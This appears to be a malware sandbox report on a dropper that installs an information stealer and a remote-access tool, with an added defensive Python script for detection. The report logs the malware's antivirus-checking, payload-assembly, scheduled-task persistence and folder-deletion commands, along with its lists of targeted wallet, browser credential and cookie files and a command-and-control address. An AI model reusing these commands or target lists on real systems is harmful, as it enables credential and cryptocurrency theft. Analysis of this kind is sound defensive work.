Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_000786B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0004A284 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0004A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_0036A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif	Code function: 38_2_0036A284 SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: Yara match	File source: Process Memory Space: Hist.pif PID: 4368, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0007914C LogonUserW
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_00035240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_00081932 SendInput,keybd_event
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0008504F mouse_event
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 787041
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SenatorsRamAspectYounger" Boat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Buffalo + Sims + Imagine 787041\l
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\787041\Hist.pif 787041\Hist.pif 787041\l
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Process created: C:\ProgramData\EHIJJDGDHD.exe "C:\ProgramData\EHIJJDGDHD.exe"
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JDAFIEHIEGDH" & exit
Source: C:\ProgramData\EHIJJDGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 661592
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "RECEIVEFILLMEDIAEVALUATING" Natural
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Saturn + Demonstrated + Preceding + Eagles + Salon + Grows + Featured 661592\h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\661592\Bk.pif 661592\Bk.pif 661592\h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y" (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_000786B0 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_00084D89 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: mg9LPWGtPB.exe, 00000000.00000003.2020681262.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3070708324.00000000000D5000.00000002.00000001.01000000.00000005.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3028683361.00000000027C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Hist.pif, SolarSys.pif	Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0004878B cpuid
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Queries volume information: C:\ VolumeInformation (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0008E0CA GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_00060652 GetUserNameW
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Code function: 11_2_0005409A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW
Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match | File source: 11.2.Hist.pif.4d20000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.Hist.pif.4953a50.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.Hist.pif.4953a50.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: Hist.pif PID: 4368, type: MEMORYSTR
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: o*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: \Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: SolarSys.pifBinary or memory string: WIN_81
                    Source: SolarSys.pifBinary or memory string: WIN_XP
                    Source: SolarSys.pifBinary or memory string: WIN_XPe
                    Source: Hist.pif.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyteP
                    Source: SolarSys.pifBinary or memory string: WIN_VISTA
                    Source: SolarSys.pifBinary or memory string: WIN_7
                    Source: SolarSys.pifBinary or memory string: WIN_8
                    Source: Yara matchFile source: 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Hist.pif PID: 4368, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif, Mutex created: \Sessions\1\BaseNamedObjects\Rmc-6MRD2P
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: 11.2.Hist.pif.4d20000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 11.2.Hist.pif.4953a50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 11.2.Hist.pif.4953a50.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Hist.pif PID: 4368, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif, Code function: 11_2_00096733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif, Code function: 11_2_00096BF7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif, Code function: 38_2_003B6733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif, Code function: 38_2_003B6BF7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
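The file-open list above (Hist.pif reading browser Login Data, cookies, history, FileZilla's recentservers.xml and a long series of wallet directories) and the Remote Access Functionality entries (the Rmc- mutex, the bind/listen socket code, and in the behavior graph further down Bk.pif's connection to 91.92.246.78 on port 2404 together with its geoplugin.net lookup) describe behaviour a defender can correlate per process. The following is an added example, not Joe Sandbox code and not part of this report: it scores constructed process events modelled on those lines. The event records, the PIDs other than 4368, the list of trusted browser binaries and the path patterns are assumptions for illustration, not an exhaustive Vidar or Remcos profile.

```python
"""Per-process triage against the stealer and RAT behaviours in the report.

Added example (not Joe Sandbox code). Events are constructed from the
report's "File opened" lines, Bk.pif's port-2404 connection and its
geoplugin.net lookup; PIDs other than 4368 and the pattern lists are assumed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    pid: int
    image: str   # full path of the process image
    kind: str    # "file_open" | "net_connect" | "dns_query"
    value: str   # file path, "ip:port", or queried hostname


# Credential and wallet stores the report shows Hist.pif opening. The regexes
# are assumptions drawn from those lines, not a full stealer target list.
CREDENTIAL_STORES = {
    "browser_login": re.compile(r"\\User Data\\[^\\]+\\Login Data$", re.I),
    "browser_autofill": re.compile(r"\\User Data\\[^\\]+\\Web Data$", re.I),
    "browser_cookies": re.compile(r"\\Cookies$|\\cookies\.sqlite$", re.I),
    "browser_history": re.compile(r"\\History$|\\places\.sqlite$", re.I),
    "ftp_client": re.compile(r"\\FileZilla\\recentservers\.xml$", re.I),
    "crypto_wallet": re.compile(
        r"\\(Bitcoin|Electrum(-LTC)?|ElectronCash|Coinomi\\Coinomi)\\wallets\\"
        r"|\\(Exodus|Ledger Live|atomic(_qt)?|Guarda|MultiDoge|Binance)\\",
        re.I,
    ),
}
# Browsers legitimately read their own profile; trust them only from Program Files.
KNOWN_READERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
USER_WRITABLE = re.compile(r"^C:\\(Users\\[^\\]+\\AppData|ProgramData)\\", re.I)
SUSPICIOUS_EXT = (".pif", ".scr", ".com")   # report: "suspicious file extension"
COMMON_PORTS = {80, 443}


def classify_path(path: str) -> list:
    """Return the store categories a file path belongs to (empty if none)."""
    return [name for name, rx in CREDENTIAL_STORES.items() if rx.search(path)]


def is_suspicious_image(image: str) -> bool:
    """True when the image runs from a user-writable location or uses an odd extension."""
    return bool(USER_WRITABLE.search(image)) or image.lower().endswith(SUSPICIOUS_EXT)


def triage(events):
    """Group events per process; return {pid: {"image": ..., "reasons": [...]}}."""
    by_proc = defaultdict(list)
    for ev in events:
        by_proc[(ev.pid, ev.image)].append(ev)

    findings = {}
    for (pid, image), evs in by_proc.items():
        basename = image.rsplit("\\", 1)[-1].lower()
        trusted_reader = (basename in KNOWN_READERS
                          and image.lower().startswith("c:\\program files"))
        stores, stealer, rat = set(), [], []
        for ev in evs:
            if ev.kind == "file_open" and not trusted_reader:
                stores.update(classify_path(ev.value))
            elif ev.kind == "net_connect":
                _ip, port = ev.value.rsplit(":", 1)
                if int(port) not in COMMON_PORTS:
                    rat.append(f"connects to non-standard port: {ev.value}")
            elif ev.kind == "dns_query" and ev.value.lower() == "geoplugin.net":
                rat.append("geolocation lookup via geoplugin.net")
        if len(stores) >= 2:
            stealer.append("reads multiple credential stores: " + ", ".join(sorted(stores)))
        elif "crypto_wallet" in stores:
            stealer.append("reads crypto wallet data")
        # Stealer behaviour is reported on its own; RAT-like network behaviour
        # only when the image itself looks suspicious, to limit false positives.
        if stealer or (rat and is_suspicious_image(image)):
            findings[pid] = {"image": image, "reasons": stealer + rat}
    return findings


# Constructed events modelled on the report (PIDs other than 4368 are assumed).
HIST = "C:\\Users\\user\\AppData\\Local\\Temp\\787041\\Hist.pif"
BK = "C:\\Users\\user\\AppData\\Local\\Temp\\661592\\Bk.pif"
CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
SAMPLE_EVENTS = [
    Event(4368, HIST, "file_open", "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"),
    Event(4368, HIST, "file_open", "C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\v6zchhhv.default-release\\cookies.sqlite"),
    Event(4368, HIST, "file_open", "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"),
    Event(4368, HIST, "file_open", "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"),
    Event(4368, HIST, "net_connect", "23.192.247.89:443"),
    Event(5120, BK, "net_connect", "91.92.246.78:2404"),
    Event(5120, BK, "dns_query", "geoplugin.net"),
    Event(1234, CHROME, "file_open", "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"),
    Event(1234, CHROME, "file_open", "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies"),
]

if __name__ == "__main__":
    for pid, finding in triage(SAMPLE_EVENTS).items():
        print(pid, finding["image"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Run as-is it reports Hist.pif (four distinct store categories) and Bk.pif (non-standard port plus geoplugin.net from a .pif under AppData) and stays silent on chrome.exe reading its own profile. Feeding it real data means mapping whatever file-access and network telemetry you collect (object-access auditing, Sysmon network events) onto the Event shape; the categories and thresholds are deliberately simple and should be tuned against baseline traffic before being used as an alert.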
MITRE ATT&CK Matrix (number in parentheses: matched signatures for that technique; entries without a number had no match)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Scripting (11); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (11); Native API (2); Scheduled Task/Job (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scripting (11); DLL Side-Loading (1); Valid Accounts (2); Scheduled Task/Job (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (12); Scheduled Task/Job (1); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Masquerading (11); Valid Accounts (2); Virtualization/Sandbox Evasion (1); Access Token Manipulation (21); Process Injection (12)
Credential Access: OS Credential Dumping (2); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (28); Security Software Discovery (151); Virtualization/Sandbox Evasion (1); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1)
